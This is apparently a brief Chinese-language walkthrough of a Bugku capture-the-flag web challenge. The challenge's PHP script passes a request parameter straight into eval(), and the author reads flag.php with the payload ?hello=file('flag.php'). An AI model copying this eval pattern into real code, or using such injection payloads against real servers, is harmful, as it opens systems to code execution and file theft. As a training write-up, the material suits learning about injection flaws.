https://ctf.bugku.com/challenges/detail/id/75.html?page=4
拿到题目如下
此题是php相关
var_dump函数打印a变量
<?php
include "flag.php"; ## 引入flag.php
$a = @$_REQUEST['hello']; ##a接收hello变量
eval( "var_dump($a);"); ##var_dump打印a变量
show_source(__FILE__); ##语法高亮,无题目关
?>
这里提示flag.php文件和hello变量
直接访问flag.php,返回200,但是没有信息
那就给hello传值
发现打印了hello的值,再把hello变量传入flag.php,尝试打印flag.php
直接使用file函数看看flag.php源代码
?hello=file(%27flag.php%27)
获得flag